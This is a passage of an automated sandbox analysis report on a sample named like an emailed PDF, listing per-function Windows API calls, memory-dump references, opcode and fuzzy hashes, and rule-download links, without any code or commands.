                                                                                                          Function 00786FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                          • Instruction ID: 01fb895660dcae9b469df147323ffeed325b47b27e59249de6edb1379065b65c
                                                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                          • Instruction Fuzzy Hash: DD014B7248814ABBCF1A6E84CC45CEE3F62BB18351B688415FA1A58031D23AC9B1EB81
                                                                                                          Function 007DB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007DB2E4
                                                                                                          • ScreenToClient.USER32(?,?), ref: 007DB2FC
                                                                                                          • ScreenToClient.USER32(?,?), ref: 007DB320
                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007DB33B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 357397906-0
                                                                                                          • Opcode ID: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
                                                                                                          • Instruction ID: 61cdae4c3d1afb7a6e70fe7f398ff0809b660472dd8ad18a3923665150595f3b
                                                                                                          • Opcode Fuzzy Hash: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
                                                                                                          • Instruction Fuzzy Hash: B01144B9D00209EFDB41CFA9C8849EEBBF9FF08310F108166E915E3620D735AA559F54
                                                                                                          Function 007DB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007DB644
                                                                                                          • _memset.LIBCMT ref: 007DB653
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00816F20,00816F64), ref: 007DB682
                                                                                                          • CloseHandle.KERNEL32 ref: 007DB694
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3277943733-0
                                                                                                          • Opcode ID: 4ddfb12f573c50752de443d3ed6ef2950b7b886861a2abe0bf56252033774cb3
                                                                                                          • Instruction ID: 0ce42541e4f34b06c346fbdba781a196ff5d90e66122c65f84061ea2c6eb0a97
                                                                                                          • Opcode Fuzzy Hash: 4ddfb12f573c50752de443d3ed6ef2950b7b886861a2abe0bf56252033774cb3
                                                                                                          • Instruction Fuzzy Hash: C2F0F4B1641304BAE61027657C05FFB7A9DFF05795F008025FA4DE5192EB759C21C7A8
                                                                                                          Function 007B6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 007B6BE6
                                                                                                            • Part of subcall function 007B76C4: _memset.LIBCMT ref: 007B76F9
                                                                                                          • _memmove.LIBCMT ref: 007B6C09
                                                                                                          • _memset.LIBCMT ref: 007B6C16
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 007B6C26
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 48991266-0
                                                                                                          • Opcode ID: ab46409e22d048579d63cb7ae04fe37b5351f777a8a19b26ac8bb2d40d90891f
                                                                                                          • Instruction ID: 05a7ba595f6f59cfd4db79ce191efd539053e0eaa3a304a34c8d9e7f7cafcf43
                                                                                                          • Opcode Fuzzy Hash: ab46409e22d048579d63cb7ae04fe37b5351f777a8a19b26ac8bb2d40d90891f
                                                                                                          • Instruction Fuzzy Hash: 81F03A3A200100ABCF056F95DC89A8ABB29EF45364F04C061FE099E227CB39E911CBB4
                                                                                                          Function 00752218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000008), ref: 00752231
                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 0075223B
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00752250
                                                                                                          • GetStockObject.GDI32(00000005), ref: 00752258
                                                                                                          • GetWindowDC.USER32(?,00000000), ref: 0078BE83
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0078BE90
                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0078BEA9
                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0078BEC2
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0078BEE2
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0078BEED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1946975507-0
                                                                                                          • Opcode ID: 289c3fe9321be54ff1fa57a2ba7fdf503bcb2ff366d20b3eb5bf565efaca67f1
                                                                                                          • Instruction ID: fc6b85c018e741fcc1d10b807972463659d54a0ea6d732bb437d7cf83dfe3af9
                                                                                                          • Opcode Fuzzy Hash: 289c3fe9321be54ff1fa57a2ba7fdf503bcb2ff366d20b3eb5bf565efaca67f1
                                                                                                          • Instruction Fuzzy Hash: 57E06531144244EADF215F64FC0D7D83F20EB05332F04C367FA6A880E187764591DB11
                                                                                                          Function 007A8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThread.KERNEL32 ref: 007A871B
                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,007A82E6), ref: 007A8722
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007A82E6), ref: 007A872F
                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,007A82E6), ref: 007A8736
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3974789173-0
                                                                                                          • Opcode ID: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                                                                                                          • Instruction ID: 07461cbc4d0d7d84cfc2267669eb0bf58d31ca28a197d4404a55ca058ac74ba5
                                                                                                          • Opcode Fuzzy Hash: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                                                                                                          • Instruction Fuzzy Hash: 77E086366122119BD7605FF05D0CB563BBCEF51791F19C829F246CA040DA3C8841C755
                                                                                                          Function 00756240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: %~
                                                                                                          • API String ID: 0-3145668672
                                                                                                          • Opcode ID: 00230d94d9e70c52a8319c945ced0322e56d6c412f47870626e2ee49bba68e03
                                                                                                          • Instruction ID: d139e84955f4382cb6a903340645db26585be96cdd1342622b2746aeccce47d1
                                                                                                          • Opcode Fuzzy Hash: 00230d94d9e70c52a8319c945ced0322e56d6c412f47870626e2ee49bba68e03
                                                                                                          • Instruction Fuzzy Hash: 33B1AF71900209DACF14EF94C4959FEB7B5FF48312F904426ED12A7291EBBC9E89CB91
                                                                                                          Function 007BAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0076FC86: _wcscpy.LIBCMT ref: 0076FCA9
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • __wcsnicmp.LIBCMT ref: 007BB02D
                                                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BB0F6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                          • String ID: LPT
                                                                                                          • API String ID: 3222508074-1350329615
                                                                                                          • Opcode ID: 50a731ef826c4e1901b3253c409f918c36020fdf4875b304369002f2f0da24c5
                                                                                                          • Instruction ID: 1c8a449cc8b9b24b05ec064b6009308a20e8b0ae362e06c9e89919b0986a0457
                                                                                                          • Opcode Fuzzy Hash: 50a731ef826c4e1901b3253c409f918c36020fdf4875b304369002f2f0da24c5
                                                                                                          • Instruction Fuzzy Hash: 9C616E75A00219EFCB14EF98C895FEEB7B5EB08310F144069FD16AB291D7B8AE44CB50
                                                                                                          Function 00762957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00762968
                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00762981
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                          • Opcode ID: 6e2186f846c5a538fbebff83c9a4056ce01f8b0b509fd3db8a63185b9b8d856e
                                                                                                          • Instruction ID: 7e61425047e0a60a2a0108827d4fc3b6c7510706f41b3ac74efaf47299b406cb
                                                                                                          • Opcode Fuzzy Hash: 6e2186f846c5a538fbebff83c9a4056ce01f8b0b509fd3db8a63185b9b8d856e
                                                                                                          • Instruction Fuzzy Hash: E9514572408744DBD320EF10D88ABABBBF8FB85351F41885DF6D8410A1DBB4952DCB66
                                                                                                          Function 007C258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007C259E
                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007C25D4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CrackInternet_memset
                                                                                                          • String ID: |
                                                                                                          • API String ID: 1413715105-2343686810
                                                                                                          • Opcode ID: 195fe590626b912eabc037364019d434f94bb93aca83fbf9d946f485351c2903
                                                                                                          • Instruction ID: 95522e1dc88b12e03234180a4ca29835a28bf06ff2ac2c1365242d0c17246c3d
                                                                                                          • Opcode Fuzzy Hash: 195fe590626b912eabc037364019d434f94bb93aca83fbf9d946f485351c2903
                                                                                                          • Instruction Fuzzy Hash: 0E313671C00119EBCF05AFA4DC89EEEBFB9FF08310F100059ED14B6162EA395A16DB60
                                                                                                          Function 007D7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 007D7B61
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D7B76
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: '
                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                          • Opcode ID: e5a915725064b497b53658e122b63b78d145e1bbf9fb64ae5da49c8691df31c2
                                                                                                          • Instruction ID: bc9d43ef516e40bc1f9233b83b1590c4c87e0bf5f52c1dca7fc73ae9eea7440f
                                                                                                          • Opcode Fuzzy Hash: e5a915725064b497b53658e122b63b78d145e1bbf9fb64ae5da49c8691df31c2
                                                                                                          • Instruction Fuzzy Hash: 77411974A05209DFDB14CF68C881BEABBB9FF48304F14416AE904EB391E774A951CF90
                                                                                                          Function 007D6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 007D6B17
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007D6B53
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$DestroyMove
                                                                                                          • String ID: static
                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                          • Opcode ID: 31252a0334b9a6bbe6cd3ff7bf59afa50986b67958644a2de8382a49f750096f
                                                                                                          • Instruction ID: 771a0358c01e9289ff8def234f348f898cc4bfa09862a4f4bc7aa903e6563888
                                                                                                          • Opcode Fuzzy Hash: 31252a0334b9a6bbe6cd3ff7bf59afa50986b67958644a2de8382a49f750096f
                                                                                                          • Instruction Fuzzy Hash: 9D316EB1200604AEDB109F64CC41AFB77B9FF88760F50851AF9A5D7290DB79AC51C760
                                                                                                          Function 007B28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2911
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B294C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                          • Opcode ID: 272d2b00cb6ff87ae69057ef86778f99e23db4ec9828e1ba78dd3ba0512776bd
                                                                                                          • Instruction ID: 5894a230398f10c74805b4ff4aa6d2ebe420394be175f24ce4f6d755e79adacf
                                                                                                          • Opcode Fuzzy Hash: 272d2b00cb6ff87ae69057ef86778f99e23db4ec9828e1ba78dd3ba0512776bd
                                                                                                          • Instruction Fuzzy Hash: F031F531601305EBEF24DF58C845BEEBBB8EF45350F144029E989B61A2D778A942CB51
                                                                                                          Function 007D66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007D6761
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D676C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Combobox
                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                          • Opcode ID: 82685239bb8c960d3cfcc7ec9e72f442378069399180552b7db9701ef18d8c6d
                                                                                                          • Instruction ID: 536213c8c6be73b3ee880eeef5f982665d7142b14113fb054abedd7f11bd6941
                                                                                                          • Opcode Fuzzy Hash: 82685239bb8c960d3cfcc7ec9e72f442378069399180552b7db9701ef18d8c6d
                                                                                                          • Instruction Fuzzy Hash: 49116D75300208AFEF219F54DC85EAB377AEB883A8F11412AF95897391D679EC5187A0
                                                                                                          Function 007D6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                            • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                            • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007D6C71
                                                                                                          • GetSysColor.USER32(00000012), ref: 007D6C8B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                          • String ID: static
                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                          • Opcode ID: f01b2cfa2bd735c879e3edacaef5891d326cb25e2f165927bdc0438281526b9a
                                                                                                          • Instruction ID: 9198c499609df335bab267c297e245e545e238c7b48af612c95c4cd08996e8a1
                                                                                                          • Opcode Fuzzy Hash: f01b2cfa2bd735c879e3edacaef5891d326cb25e2f165927bdc0438281526b9a
                                                                                                          • Instruction Fuzzy Hash: D1212C72620209AFDF04DFA8CC45AFA7BB8FB08315F004529FD56D2250D739E850DB60
                                                                                                          Function 007D6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                          Download Yara Rule
